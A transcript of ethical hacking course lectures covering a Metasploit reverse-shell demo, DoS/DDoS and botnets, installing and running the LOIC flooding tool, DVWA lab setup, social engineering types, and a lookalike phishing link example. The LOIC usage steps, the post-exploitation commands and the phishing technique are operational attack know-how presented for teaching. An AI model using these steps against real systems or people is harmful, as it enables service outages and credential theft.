Yes. So started reverse TCP. I'm double clicking this one. So I'm getting an access here. So there is a command called screenshot, which will take the screenshot of victim system. So you can observe here the screenshot has been saved in this particular target, right? So just copy the thing. Okay, just copy this one. So open the folder and just open that path. I think the path was not copied. Home and Kali. Okay, you can simply open this Kali, and here you can see this is the image. What is the file name? Just observe the file name. MWQ. Let us check MWQ. Yes. See, you can observe here. So this is the file. See, this is the file. Yes. So which we have executed now. See, this is a screenshot we have taken, right? You can observe the date 15/12/2022 1939. At that time we have applied the screenshot. So we have not accessed the desktop, but we are taking the screenshot from the attacker system itself, right? So this is how we can gain the access of machine, right? Victim system. So also there will be a lot of commands. So screenshot is one command, and like that we will be having the different Metasploit shell commands. So we can use those commands to access the victim system. See, you can also shut down. There is a command called shutdown, which will shut down the system, right? So sorry, again the session has been died. Okay, so once again I'll open, and I will once again I will use one more command, and I will explain you about this one. So double click. So the access has been started here. So Metasploit shell. So use a command called shutdown. So hi guys. So already the system has been shut down, and once again I have started the system. So here you can find the shutting down, and again the Metasploit session 4 has been closed. So if you want to again get the access, just copy the payload and trigger that payload. Automatically you will gain the access of the victim system, right? So hope you understood this one, and please don't try it on your personal revenges, right? This is only for the educational purpose.
So in today's session, we'll discuss about one more concept in ethical hacking or cyber security, that is DOS attacks and the DDoS attacks. So DOS or DDoS attacks. So what exactly these DOS and the DDoS attacks? So DOS means denial of service attacks. Denial of service. And coming to the DDoS means distributed denial of service. See, we'll see the working of denial of service. What exactly this denial of service? Obviously, you will be understanding about the DDoS, right? So coming to the denial of service, deny means refusing. So refusing the service is called the denial of service. So what type of service? So we can say the service can be done from the server or any machine or any resource or any network. So if the service is refused, then automatically we can say it as a denial of service. For example, so there will be a client and there will be a server. So this example you will be understanding much more, right? So client and server. Obviously we know that client will send the request. Obviously the server will send the response. So that means the server is giving some sort of service to the client. And if the server refused this response to the client, that implies denying of service. Then why we are calling it as an attack? So this denial is done by the attacker, right? So the attacker makes the server to refuse the response to the client. Okay, so the attacker will make the server down and stops the service to its clients. So that we call it as a denial of service attack, right? So I'll write an definition here. So this attack, DOS attack, so it is a cyber crime. Or an attack which makes the server or a machine, which makes a server or machine or any other resource down and unaccessible. So it can't be accessible, right? Accessible to its users. It's called DDoS attack. So it is a cybercrime or attack which makes the server down and inaccessible to its users. So how the attacker will make the server down? Okay, how the attacker makes the server down? Obviously, if the server is down, it can't be accessible. So that implies it can't respond to all the services. All the requests coming from its clients. So obviously, the server will refuse the request. That means denial the service. So how these attacks will done? So the attacker will do the attack by flooding target with traffic. Flooding the target with the traffic. Flooding means more number of requests, resending the request. Okay, let me explain with an example. So let us take one client and a server. So this is a client and let it be, this is a server. So this is a client. So obviously a client will send the request and comes the response. Okay, so it is a request and it is a response. So everything will be fine, right? So if one request is sent to a server, automatically the server can respond. The server can respond, right? If 100 requests were sent to a server, obviously the response will be slow. Response will be slow. That means there will be some sort of delay in the responding, because the server have to give the service for all the requests. And if the same thing happens for 1000 requests, so obviously the server can't respond to all the requests. So obviously it can't be accessible. So the attacker will flood the target with the traffic. So what is this target? So here the target will be the server. Target will be the server or any machine or any resource or any network, whatever it may be. So the attacker will flood the target with a more number of traffic. So for example, consider the client and server. So a number of requests will be sent from the client to server, so that the server can't respond to each and every request coming from the client. That implies, so the server is refusing to respond and it is inaccessible, right? So such type of attacks we call it as a denial of service. Denial of service. And then what is this DDoS? Distributed denial of service. Distributed denial of service. For example, see here, if the client was sending continuously the packets, so thousands of packets, thousands of requests to the server, so obviously it can't respond to all the requests from the client, coming from the client, right? So in such a way the server will refuse the request coming from the client. And similarly, so if you are having a more number of systems, and there is a server, so getting more number of requests from the multiple systems, right? Sending a flooding of traffic. See, multiple requests to the server. This is called DDoS, distributed denial of service, right? If single system targets the victim, that is called the DOS. If multiple systems targets the victim, that is called a DDoS. So this is the target. This is the target. So single system and a multiple system. So let me write here. So DOS. So this is a DOS. That implies single system targets victim system. Then we call it as a DOS. And if the same multiple systems targets victim system, then we call it as a DDoS. So single system and the multiple system. See here, if you observe here the client, let it be A, and there are two more systems. Let me tell you this thing. So this is a B and this is a C. The system B and system C. And the B is also sending the request to the server and also getting the response. C is also sending the request and C is also getting the response. and A is an attacker system. So A is an attacker. So if the attacker continuously flooding the target with the traffic, that means sending more number of requests, automatically the server will not respond to A or a B or a C. Right? So B and C are the genuine, that means the legitimate users, but still they are not able to get the service from the server. Right? So that means they'll think that the server is refusing the response. Right? So such type of attacks we call it as a denial. That means this client, that means the attacker, will make the server down and it will make not to respond to the remaining clients, the legitimate users. Right? Here also the same thing. So here multiple systems. So actually, so one system will be there. It's an attacker system. So the attacker system will find the vulnerabilities. For example, this is a A and this is a B, this is a C and this is a D. So once the attacker takes the control of one system, the attacker will send the malware to the remaining systems of the network. Okay, it will infect the other systems. So once A got infected and A is attacker, and that system will send a malware and gets the control of other systems of a network. That means A gets the control of B, A gets the control of C, A gets the control of D by sending the malware. Right? So once A got the control of all the other systems, so A will make sure that the complete request, a flood of requests, should be sent by B, C, D at a time to the server. And this type of network, that means a network with infected, so this is an infected system, right? So infected systems is called a botnet. Okay, a network of infected computers is called botnet. And each system we call it as a bot. We call it as a bot, and that will infect other systems. Obviously now it is 3, and these 3 systems will also infect other systems. So like that, the complete network, the systems which are available in complete network will be under the control of attacker. So at a single time, the attacker will trigger an event so that all the systems of all the systems of a network which are infected will start sending the messages or a request to the server. So obviously the server will receive a lot of requests. So obviously the server can't respond to all the requests. Automatically the server will be getting down and it will not be accessible by another legitimate users like some so let it be some E and F. So E and F are not infected, but the server can't respond to E and F because of complete request sending by the attacker. So this process we call it as a DDoS, distributed denial of service. That means if a single system targets the victim, that is called a DOS. If multiple systems targets the victim, that is called a distributed denial of service. Right? So hope you understood this DOS and DDoS attacks.
In today's session, we'll see the installation of one more tool in ethical hacking, that is LOIC tool. LOIC. So LOIC stands for Low Orbit Ion Cannon Tool. And what is this tool? So this tool is a network stress tool. Network stress tool, and this is open source. So it is available free of cost. It's open source, and it's also the DVOS attack tool or DDoS attack tool. So actually, what is this DOS and DDoS attack? So DOS attack means a denial of service attack, and DDoS means a distributed denial of service attack. So in our next session, I will explain you what exactly about this DOS and DDoS attacks. And mainly the purpose of using this particular LOIC tool is to test the purpose of using this tool is to test how much traffic a target machine can handle, right? So now we'll see how can we install this LOIC in our Kali Linux. So I have opened this Kali Linux, and then open the terminal first. Okay, now let us install. We have to install a monocomplete tool before executing this LOIC. So install monocomplete tool. Okay, so go to the Kali Linux and go to the browser, open the browser. So first we need to download the LOIC, and then we have to execute the monocomplete tool. So go to the google.com, and here just type LOIC. So you can download this LOIC from the first website. So here you can observe the download button, and see here, just click on download. So automatically the LOIC will be installed here. So save the file. Yes, so just open the folder. You can observe here there is a zip file. So extract this file. So I'm extracting here. So we need to execute this LOIC. So go to the terminal. So use the command apt install monocomplete. So once you got installed this monocomplete, automatically by using this mono command, we have to execute the loic.exe, which is a DOS attack tool or DDoS attack tool. See, so I'm installing this one. So you can observe. So it was started and completed, right? So now the installation was completed. Now just use a command called mono. So first open the terminal in the location where we have installed the. So here we are having the loic.exe. Open terminal here, and here see in the downloads. Now you can observe pwd, so which is present working directory. That means we are now in the downloads folder where the LOIC has been installed. Now use the command called mono loic.exe. So exe file we have extracted from the downloaded file in the internet, right? So just execute, automatically the LOIC will be opened. So you can observe here low orbit ion cannon tool,
and here the DDoS or DDoS attacks will be done with the help of the methods. You need to select a method, either the protocol, the TCP protocol, or UDP, or a HTTP, and simply you can give the URL which you want to apply the DOS attacks or DDoS attacks. So you can click here, automatically the flood of packets will be run. Okay, the flood of requests will be given to the server, and that makes the server down. That we call it as a DOS attack or DDoS attack. So this is how we have to install the LOIC, the testing tool. Okay, testing tool, right? So hope you understood this one. So if you are having any doubts regarding this installation, if you got any error during the installation process, so feel free to post your doubts in the comment section. Definitely I will try to clarify all your doubts.
So in today's session, we'll discuss about the installation and configuration of one more tool in ethical hacking, that is DVWA tool. First, let us see what is about this DVWA tool. So this DVWA stands for Damn Vulnerable Web Application Tool. It's a damn vulnerable web application tool, and the name itself indicates. So this tool is to practice by the professionals of some of the most common web vulnerabilities. Most common web vulnerabilities. See, that means there will be a lot of web applications, and definitely there are a lot of cyber security attacks that can be done on the websites, right? Web applications. So whatever the web vulnerabilities we can test or we can practice with a legal tool that called as this damn vulnerable web application tool. And here we can practice these vulnerabilities in 4 different security levels. So we can practice them in a different levels. What are those levels? The first one, low level. Second one, medium. And the third one, high. And the fourth one is impossible. So in all these security levels, we can practice some most common web vulnerabilities, right? So a few things are like SQL injection attacks, session hijackings, okay, so cross-site scripting. All these things can be done, all these things can be practiced with a legal tool called DVWA tool. So that's the most important tool used by the ethical hackers. So now let us configure this DVWA tool here. So if you are saying it as a web application, simply we can say web application. If it is a web application, there will be some sort of database will be there, and some sort of a web server will be there. So here we'll see the database as a MySQL and the web server as a Apache web server, right? So we'll install the DVWA and we will configure that, and in our further sessions we'll see the whatever the attacks we can practice on these things, right? Now let us open the command prompt. There's a terminal. So go to the admin privileges, sudo su. Now we have to install this one DVWA tool by using the GitHub. So we'll be directly having the link from the GitHub. So directly you can go with the DVWA GitHub, so that we'll get the link. See, this is the link. See, this is the link, and we have to clone this one. So where we have to clone? So we have to clone in the folder called variable www and html,
right? So not in the home and Kali. So now we have to change this one. See, cd where www html. So go to that location. You can observe ls. Yes. So here you have to clone the link. So in order to clone the link, so git clone followed by the link. So this is the link we have copied just now, right? So click enter. Automatically it will start cloning. Once it will get finished, see, yes, you can observe ls. So we are having a DVWA folder here, right? Now the next one, we have to change the permissions of the folder. Okay, in order to change the permissions, the command is chmod, and we have to give the complete read, write, modify permissions for all the user, group and others. So that's why we'll go with the chmod or 777. That means it will give the complete read, write, modify operations for all the user, group and others. So to which folder? To DVWA folder, right? So automatically the modifications, I mean the permissions has been given. Now let us move on to the DVWA. cvd DVWA, and again go with ls. So here just again go with the config. One more folder, it's a config. Now you can observe there is only one file, dist file. Now rename this one with another file, or copy this one with another file name called config.inc.php. So for that, just go with the copy command cp. So config.inc.php dist, this is a source, and I'm just copying it to another file name config.inc.php. Okay, I'm just copying the same file with a different file name. Yes, now you can observe two files will be there now. Two files will be there. Now edit this PHP file, and in this PHP file we'll be having the database name, the username, password, etc. will be there. So we need to change, if required, the username and the passwords, and also database. So just edit this one. So vi config.inc.php. You can observe here. Yes, see, server, it's a 127.0.0.1, and database name DVWA, username is DVWA, password is p@ssw0rd. A little bit complex, right? Yes, let us change it one. So I'm using the VI editor, so I'm moving on to the insert mode. So I'm just moving here. I'm changing the username as a user and a password as a simple password. There is no @ symbols and all these things. I'm just giving a password. And database name is DVWA. I'm not changing it. So you can also change it, no problem. And a port number, I'm not changing anything else. So I'm just changing the user and the password. So go to the command mode, save and quit, :wq save and quit. So once it was done, now configure the database. Configure the database. So in order to configure the database, first we have to start the MySQL service. So for that, the command is service MySQL start. It will start the MySQL service. Once it was started, then we have to enter into the MySQL. See, it was started. Now we have to enter into the MySQL in a user mode. So MySQL user mode with a root password, right? So you will get a MariaDB. So this is a prompt here. Now we need to create a database and user, because in our previous step we have changed the database. I mean we have given the database name as DVWA, and we have given the name of the user as a user, and we have given the password as a password. So we need to create a database, as well as we have to create the user for particular server, that means 127.0.0.1. Now create a database. So in order to create a database, the command is create database. What is the database name? DVWA. So just now we have seen. Yes, so can't create database because database already existed. So already database is existed. If not, just create the database. Now create the user. Create user. The command to create the user, right? Create user. Use user at the rate 127.0.0.1 identified by password. Sorry. Create user at the rate 127.0.0.1 identified by password, right? So I think user is also available, so let us check. Show user is already available, I think. Okay, so if not, just go to the command like this. Okay, right? So once you create this user, just give this command. So create, I will write here, right? See, use this command to create the user. Create user, a user at the rate 127.0.0.1 identified by password, right? So once it was done, then we have to give the privileges to this particular user, all the privileges to this particular user, right? So else we'll change the configuration, we'll change the username. Okay, so that there will be no confusion. So vi config php, so I'll change the username as username, user as username and password as password, right? Now we need to create the user now, right? So I'll start the MySQL server service. Yes, once it was started, so just open the MySQL with the root. So here we will write create user, the user name is username, right? See, you'll get like this query. Okay, 0 rows affected, that means the this username has been created. Now we need to grant the privileges. So grant all privileges on the database name is DVWA.star, that means all the files of a particular folder too. And here you can write username at the rate 127.0.0.1 and to this user which was identified by password. So just be careful while writing the command. Grant all privileges on dvwa.star to username at the rate the server name, the server address, identify the password. So you can observe query okay, 0 rows affected. So obviously the privileges are also has been given here, right? So just come out from the database. Now we need to configure the server. So now the database is completely clear and now we need to configure the server. So in order to configure the server, just start the Apache server. So service Apache 2 start. So once the server has been started, we have to enter into that. That means we have to enter into that particular location, right? So it will be available in etc folder and php folder. Now ls. So you can see the version. Go to this particular version 8.1 and again go to the ls. So there is a name called Apache 2. So go to the Apache 2. Now ls, you can find the php.ini file. So just edit that one with a vi editor. So here also we need to edit this file. So vi php.ini and here so you can observe just scroll down up to 44%. So here you can observe the fields in the fopen wrappers column. So there you can find the two things, that is allow URL fopen and allow URL include. So make sure both should be in an on state. Okay, if any one of these things is in off state, just change it to the on state. And so now I am not changing anything because already both are in the on state, right? So just if any one is in off state, just change it to the on state. So go to the command mode, quit and save. Then so that's all. Go to the browser now. So after opening the browser, just go with the localhost and give the folder name DVWA. So you will get this login page. So this is a DVWA login page. So just log in with admin and password. Password is the password, admin is the username, login. And once you got the login for the first time, so you will find here restart. Okay, so reset the database. So simply you can reset the database. Once again you will get the login, and here you can see all these type of web vulnerabilities can be practiced in this particular tool. The brute force attack, command injection, CSRF, file inclusion, upload, insecure captcha, injection attack, cross-site scriptings. Okay, so all these things can be implemented in this one. See, the aim of DVWA2 is to practice some of the most common web vulnerabilities with various level of difficulty. So where we can find these various levels of difficulties? So here DVWA security, so click on this one. So here you will be finding the different levels, 4 levels as I have said that. So low, medium, high and impossible, and here you can change the levels. So by default it will be the impossible. You can go with the low and submit. Click on submit, and similarly medium and submit, and you can just go with the practicing all these web vulnerabilities, right? So this is the most popular tool that can be used to test the web vulnerabilities by the ethical hackers.
So in today's session we'll discuss about one more concept in our ethical hacking, that is social engineering attacks. So social engineering attacks. So these are the attacks that will be performed due to the human error or a wide range of some human interactions, right? So attacks done through human interaction. So previously we have seen different types of attacks where the attacker will take the control of the victim system, so that the attacker will gain all the information from the victim system. But here the attacker will not take the control of a victim system. The victim itself will provide his or her data to the attacker. So that means some sort of psychological manipulations will be done on the users to get the information from them itself, right? So psychological manipulations will be done on a victim to collect information. So that means these type of attacks will be done because of the human errors. Okay, these attacks done due to human errors. And here the most important thing is attacker will not take any control from the victim, but victim himself or herself will give the information to the attacker. So in such a way, the psychological manipulations will be done by the attacker. So information will be revealed by the victim. So victim will reveal the information to the attacker, right? So these type of attacks where the victim reveals the information to the attacker, that is called as a social engineering attacks. So now we'll see the life cycle of this social engineering attacks. So these type of attacks will be done in 4 stages. The life cycle of this social engineering attack consists of life cycle of social engineering attack. So here the first stage is investigate. So in this phase, the attacker will gather much more information about the victim. So here the first step is the attacker will select the victim. So attacker will select the victim. So after that, the attacker will gather much more information. About a victim, right? After selecting the victim, the attacker will gather much more information about the victim and then identify the weakness of this particular user. Okay, identifies weakness of a victim, right? Identifies the weakness of a victim. Then, so this ends the first phase, that means the investigate phase. So complete investigation about the victim will be done in this particular investigate phase. And the second one, the phase called as a hook phase. So in this hook phase, so once in the investigation, once the attacker identifies the weakness of a victim, now the attacker will start manipulating the victim. So the attacker will give a lot of fake stories to the victim so that some trustworthiness will be established between the attacker and the victim. So once the trustworthiness is established, automatically the victim will share the information to the attacker. So in such a way the manipulations will be done, and all these things will be done in this hook stage. That means the attacker plays a fake story, starts manipulating, establishing trustworthiness. This is most important. Trustworthiness. So once this trustworthiness established between the attacker and the victim, automatically the victim will be revealing all the information, right? So this is most important. This is a hook state. So once the complete this trustworthiness is established, now it will go with the third phase. The third phase is play. Third phase is play. So here the attacker will start gathering the information, start gathering victim sensitive information. So the attacker will, in the second stage, so some sort of trust will be established between the attacker and the victim. So with that help, so this attacker will start gathering the victim sensitive information. So it executes some types of attack. Executes the attack on a victim to gather the information. So this happens in the third phase. Okay, third phase. And the last one, after gathering the information, what happens? Simply the fourth one, which is a exit phase. Exit phase. So in this exit phase, attacker ends up the conversation with victim. Ends up the conversation with victim and also clears all the tracks. That means in which way the attacker communicated with the victim and in which way the attacker takes the information from the victim, all those complete paths will be get closed. So clearing all the tracks through which the attacker manipulates the victim. So with this phase, the attack will be completed. So in our real world, so there is one example happens in our real world. That means we are using a lot of applications in our mobile. So in that most commonly we are searching, most of the people were searching for the loan applications. So there are a lot of applications. So first they will start telling fake stories. That means maybe within 1 hour, within 2 hours we'll give the money, right? So that is our weakness. We want money very urgent. So that is our weakness. They'll identify our weakness. So they'll play with the an Android app. So there we will start giving our information, our sensitive information, right? So we want to give our sensitive information so that they'll give some loan amounts, right? So nowadays this happens, right? So such type of attacks, so that the apps may be genuine or maybe it's a fake, I don't know, but most of the people were getting trapped with this particular social engineering attacks, right? So we should be very careful about this thing, because these attacks particularly done due to the human errors. That means we are only providing the information to the attacker, right? So we should be very careful. So we should not disclose our information to any other third persons, right? So this is the life cycle of social engineering attacks. The first phase, investigate. Second phase, hook. Third phase, play. Fourth phase is exit. And this is done due to the human errors. So the attacker will do the psychological manipulations on the users so that the user will himself or herself will provide the information to the attacker, right? So hope you understood this social engineering attack. What is a social engineering attack and what is the life cycle of social engineering attacks? So we'll stop here. In our next session, we'll go with the different types of social engineering attacks. So there will be a technology based attacks, there will be a human based attacks. So some sort of technology will be used, but that technology will be used only to get the information from the victim itself, not to take the control of the victim system, right? So some sort of technology will be used, some sort of human error, human based attacks will be there. So all these things we'll cover in our further sessions, right? And one more thing, very important. So this is only for the educational purpose. Please don't try all these ethical hacking course for your personal revenge. In today's session, we'll discuss about different types of social engineering attacks. So in our previous session, we have seen the social engineering attack and the life cycle of social engineering attack. So mainly these attacks depends upon the human errors. That means the psychological manipulations on the humans. So we'll see, in this session we'll see what are the different types of social engineering attacks, and these are the attacks we oftenly use. We'll see in our daily life, right? See, social engineering attacks. So these are categorized into two ways. So one is technology based. So another one is a human based. So that means if you are going to this technology based, so the attacker will use some sort of technology where the victim will provide his or her information, right? And coming to the human based, there will be no technology, but still the attacker gets the information from the victim itself. So those we call it as a human based. So coming to the technology based, the first one is baiting. So I'll explain one by one later. So watering hole attack, and mainly phishing. Again, in this phishing, so we can say email phishing, spear phishing, whaling, wishing, smishing. So these are very few which uses where the attacker will use this some sort of technology to get the information from the victim. And the second category is a human based, and here comes with the first one, shoulder surfing, dumpster diving, reverse social engineering attacks. So there will be a lot of attacks apart from these, but mainly I am focusing on these things. Okay. So in our daily life, we might be experiencing any one of these attacks, but we don't know these are called as a social engineering attacks, right? So let me explain one by one so that you will be related to your personal experience of these attacks. See, coming to first one, baiting. So here the attacker will use the physical devices, and these physical devices, so in these physical devices some sort of malicious code will be included. So some sort of malicious code will be there in physical device. Okay, and these physical devices will be left over in the place where the victim often visits, right? So these devices will be thrown or left in the place where victim often visit. That means simply we can say in the public places. Okay, for example, so they'll take one pen drive or a flash drive. So they will include some sort of malicious code in that pen drive, and they will label that pen drive with an important documents or important or very official or confidential information. So they will label the pen drive with such type of things which makes the curiosity to the victim, right? So here the victim is a normal user. So we people will be the victims, right? So they will left these pen drives or flash drives or throw these pen drives or flash drives in the public places where the public will be often visit, right? So once the victim observe this pen drive with a curiosity, definitely he or she will collect this pen drive, and the next step they will insert into their own system or a laptop, right? So once they insert this flash drive into the laptop, immediately whatever the malicious code which is available in this physical device, that will be copied into our system, and automatically it will start spreading, right? So such a type of attack we call it as a baiting. So they will prepare a bait to trap the victim. Here the bait is nothing but a physical device with a malicious code. So we should be very careful if you found any kind of these physical devices in the public places. So before inserting into your system, so take care about this one. Maybe that particular thing is a baiting. That means once you insert this physical device into your system, automatically your system will be affected with a malicious code and it will be start spreading, right? So such type of attack we call it as a baiting. So here some sort of technology will be used. So that's why this comes under this technology based. Next, watering hole attack. So in this watering hole attack, so the attacker will attack the website. Okay, here also some sort of malicious code will be inserted, but here the malicious code will be in a website where the user often visits, right? So the popular website, they may include in type of advertisements, we call them as adwares, right? So whenever the user visits that particular website, automatically this type of malicious code will be downloaded into your system and then it starts spreading in our system. So once it got spreaded, automatically the information can be sent to the attacker. There might be a chance, okay? So we can't say everything is a malicious code, but there might be a chance of getting inserted into our system and taking over our control and telling our personal information, sensitive information to the attackers. So such type of attack we call it as a watering hole. So through that particular backdoor, the code will be downloaded to the website, downloaded to the clients, that means a user's system. So whoever visits the website, the malicious code will be downloaded into their system. So such type of attack we call it as a watering hole attack. Watering hole attack. And the next one, phishing. So here phishing, so some sort of link will be created. So link will be created which redirects to a website of malicious code. Some sort of links with a malicious code will be automatically used in this particular phishing, whether it may be email phishing, spear phishing, whale phishing, wishing or smishing. So that will be, the attack will be done through the links, that means hyperlinks. Okay, so such type of attacks we call it as a phishing. So here there are different types of phishings: email phishing, spear phishing, whaling, wishing and smishing. So there is another type of attacks, that is a website phishing. Okay, one more thing, that is a website phishing. So this is very important because we will be experiencing these type of things in our daily lives. See, one is a email phishing. So we will be getting a lot of spam mails which consists of these particular links, right? So we may get we may get an email from the bank such that displaying the message, you have to update your KYC. So in order to do that, so immediately click on this link and submit your KYC, otherwise your account will be blocked. So you will be receiving this type of messages, right? So we should be very careful that from where we are getting that particular message. Okay, so that message will be from the attacker who will send the link which redirects to the malicious website. So in a rush, we'll simply click on that link, that will be redirected to the website where we have to enter all our sensitive information, and that is not a legitimate website, it's an attacker's website, so that whatever the information you are giving into that particular website, that will be seen by the attacker, right? So through the email phishing means this type of links will be received to the user through the emails. I think everyone have experienced about this email phishing, because these days we are getting a lot of emails, right? So you have won a lottery of some 1 lakh pounds. So please click on this link and enter your details so that you can claim your rewards. So such type of emails we are getting, right? So that is nothing but email phishing. So just they will get our information. And the next one is a spear phishing, and here they will be targeting on the particular individuals. So in the email phishing, the emails will be sent to all the users. But here in the spear phishing, so there will be some targeted individuals. Only to that particular individuals the emails will be sent, the link will be sent. So once the link will be sent, automatically if the user, the target individual click on that link, automatically the information, it will prompt for it will ask for the information, so we'll give the information. So without verifying from where we are getting that link, right? So spear phishing means the links will be sent to a target individuals, a particular individuals. And coming to the whaling, so whaling, sending the links to high ranked individuals, okay, a big shots. So they will be the targeted audience, right? So that is called a whaling, right? And coming to the phishing. So coming to the phishing, here also the attacker will use a phone call. So hope everyone have experienced this type of attacks also. So we'll get a phone call from a legitimate authority to get the information, right? So recent times, so we are getting a phone calls from the credit card department saying that your rewards will be getting expired, so that please verify your card so that rewards will be changed to the money, so that you can use that money. Okay, you can change your reward points to the money, right? So they'll ask about all our information, our phone number, our email, and then our date of birth, okay, our PAN number, our card details, 16-digit PIN, 16-digit number, everything they will ask. So we thought that yes, our reward points will be get expired, so that we can change it into. So before they are getting expired, we can change them into the money, so that we will provide all the information, because they'll say about it is a verification call. But so one thing we have to remember, no one will ask the information, our personal information, right? We should not disclose our personal information to anyone. So this type of attacks, we call it as a phishing. That means through a voice calls. So the attacker will call to the user, and they will act as a legitimate authority. The call is from legitimate authority, and they'll ask some sort of information, so that we will provide the information, right? So that they'll get the information from the user in such a way. So that type of thing we call it as a phishing, right? And the next one is smishing. So similar to our phishing, here the attacker will use a SMS. So we'll get the SMS with the links. So just like our email phishing, we'll get a SMS. So your account will be blocked. So in order to avoid that, just click on this link and update your KYC immediately. So they will rush the users. So there is a very short time. So in a hurry, automatically the user will click on the link and they will be trapped. So here in the smishing, the attacker will use the SMS, right? So, and then the website phishing, so they will create a similar website, so which is similar, creates a website which is similar to our legitimate website, right? So they'll use the website, the fake website, and they'll pass the website link to the users, so that they'll being trapped. The users will being trapped. So that type of phishing, we call it as a website phishing. So in all these phishing, so they'll use this link with a malicious code. They'll pass a link with a malicious code. In an email, they'll pass a link. Spear phishing, they'll pass a link to the targeted individuals. In a whaling, the target is with the high ranked individuals, and wishing they'll use a phone call. Okay, they'll use a phone call and they'll get the information. And the smishing, they'll use the SMS. And website phishing, they clone the original website, right? So in all these cases, some sort of technology will be used, right? So I think everyone have been experienced at least once with these phishing attacks. Anyone among these phishing attacks? So email phishing, spear phishing, whaling, etc., etc., right? But we don't know these are the social engineering attacks, right? Next, coming to the next category, that is a human-based. So here the no technology will be used, and we call it as a non-technical social engineering attacks. Non-technical, there will be no technology. So first one, shoulder surfing. So here the attacker will be standing behind our shoulder, and they'll observe our system, our keyboard, our keypad, and whatever the thing we are providing into the system, everything will be visually seen by the attacker. So that's why the name called as a shoulder surfing. So the attacker will be behind our shoulder, right? So the attacker will be standing behind our shoulder and observing activities done by user, right? So one best example. So we all know that there will be one rule displayed near the ATMs. So only one person should be entered into the ATM. So after completion of the transaction by one person, then only the second person should enter into the ATM. That is just because of this shoulder surfing. So if more than one person standing in a line, so automatically if you trying to enter the pin, so the person behind you may observe your pin, right? So that's the reason why they kept a rule that one person should be entered into the ATM. So in some places they will be following that one, and in some places they are not following, but we should be very careful if anyone standing behind us. So they will observe whatever the activities we are doing, everything will be recorded by them. Okay, not everyone, but there might be a chance. So we should not give a chance to anyone, right? So make sure, if you are using any confidential information, if you are trying to use any confidential information, make sure that no one is on your behind, right? So usually we are going to use the internet or any transactions in the public places. So there is a chance of getting this shoulder surfing, right? In the public places, many of the people will be keeping run around us, right? So make sure that no one is behind you, so that before giving your personal information or financial information, whatever it may be, right? So that type of attack we call it as a shoulder surfing, right? So the attacker will be standing behind the user and observing all the activities done by the user. So here there is no technology. Here there will be no technology. So directly the attacker is observing all the activities. And the next one is a dumpster diving. Dumpster diving. So this is getting information from discarded data. So I think this concept we often watch in the movies, right, during the investigations. So automatically the first investigation, while doing the investigation, the police officer will check the recycle bin or a trash or garbage, right? So that type of thing we call it as a dumpster diving. So here the attacker will search the trash box or a recycle bin or a garbage. Okay, that may be online or offline. If it is online, they'll watch for the recycle bin in our system. If you are using email, they will go with the trash box. So whatever the thing, so they may get the receipts. Okay, they will collect some data from the trash. So collects data from trash. Example, receipts. Okay, they can collect the receipts and they can collect some whatever the thing, I mean the waste wrappers where we have written some phone numbers or email addresses, contacts. Okay, so some sort of calculation, some sort of reports, wasted reports, everything. So from that also the attacker may get a chance of attacking the user. So such type of thing we call it as a dumpster diving. So we should be very careful. So there should be, I mean, we should not use any sort of things in the trash also related to our information, sensitive information. So that may be anything, your phone number or your friend's phone numbers, email addresses, whatever the thing. So they'll collect some sort of information from the trash, okay, from the recycle bin. So such type of attack we call it as a dumpster diving. So from the trash, from the discarded items, right? So we often see this situation in movies, right? The last one is a reverse social engineering. So in this reverse social engineering, there will be no contact from the attacker to the victim. Rather, the victim will contact the attacker. So the attacker will gives a situation, will brings the situation that the victim directly contacts the attacker. So such type of attack we call it as a reverse social engineering. Here, attacker doesn't contact the victim, but victim contacts attacker. So the attacker will brings the situation, the victim should contact the attacker, right? So the attacker will create a problem, okay, in order to create a problem to the victim, so that the victim believe that the attacker is the correct person to solve that problem, and victim automatically contacts the attacker. So here the high degree trust will be established, right? So such type of attack we call it as a reverse social engineering attack. So here the attacker doesn't contact the victim, but victim directly contacts the attacker to solve the problem which the victim had, right? So here the high degree trust will be established between the attacker and victim. So such type of things we call it as a reverse social engineering. So these are all different types of social engineering attacks, and these are very few, and apart from these there are a lot more. So the technology based and human based. So in the technology based, some sort of technology will be used, and in the human based, so there will be no technology, directly the attacker will be getting the information from the user itself. So in today's session, we'll discuss about one more type of attack in our ethical hacking, that is a phishing attack. Phishing attack. So this is one category of social engineering attacks. Social engineering attack, right? So here the attacker will send the malicious links through the emails or SMS. So once the victim clicks on the links, so the victim will be redirected to the web page which is looking as a legitimate website, so that we will give our information. It will be transmitted to the attacker system, right? So attack done through malicious links. So usually what happens here? So here the link can be of two categories: visible link and actual link. Visual link and actual link. So the actual link is which was written in the anchor tag. So this is the link which was written in anchor tag. So in the web page we are going to use these anchor tags to create the hyperlinks, right? And the visible link, which is visible to user, So there is no synchronization between this visible link and the actual link. And once the user watches this visible link and clicks on this one, immediately the site will be redirected towards the actual link which was written in the anchor tag. So normally most of the users doesn't concentrate on the URL which was written in the address bar, right? So here that will be taking an advantage by the attacker to get the data from the victim, right? So for example, let us write one simple link. So I will write ahref is equal to, here we will generally give let us take google.com. so https www.google.com. so this is the link which was written in the anchor tag, and here I will write Google and close the anchor tag. So this will be the visible link, and this will be the actual link. So immediately if you save this with the .html, what we'll get? We'll get a web page, right, with a small text as a Google. So immediately when the user clicks on this Google, automatically it will be redirected to this particular website. So this is a legitimate, right? So what attacker will do? So the attacker will give the target URL. It's not an actual URL. So let it be www. See, the spelling of Google is different, Google. So whenever, and the visible link is similar, Google. So whenever the user clicks on this one, automatically the the web page will be redirected to this particular website, which will be looking as a similar to the google.com, right? So automatically we'll give our sensitive information into that particular website, because we will treat it as we will trust it as a legitimate. We will never observe the address bar, right? So obviously we'll give some sensitive information, automatically that complete data will be trapped by the attacker. So this actual link can be an IP address too. That can also be the IP address, not only the URL, it may be also the IP address. So in our Kali Linux, in our ethical hacking, in a Kali Linux, there is a tool called SC Toolkit, where we can practice all these social engineering attacks. One among that one is a phishing attack. So we can practice the phishing attack. We can check what type of phishing attack will be done by using a tool called Social Engineering Toolkit, SC Toolkit. So in that we can use these phishing attacks, right? So there will be web templates, site clonings. So we need to give one IP address so that automatically the template will be cloned to that particular IP address, and we can make use of that IP address to get the details of the victim. Now we'll move on to the Kali Linux. We'll see what is a SE toolkit and how a website can be cloned, or how this phishing attacks can be done. Right? So let's move on to the system.
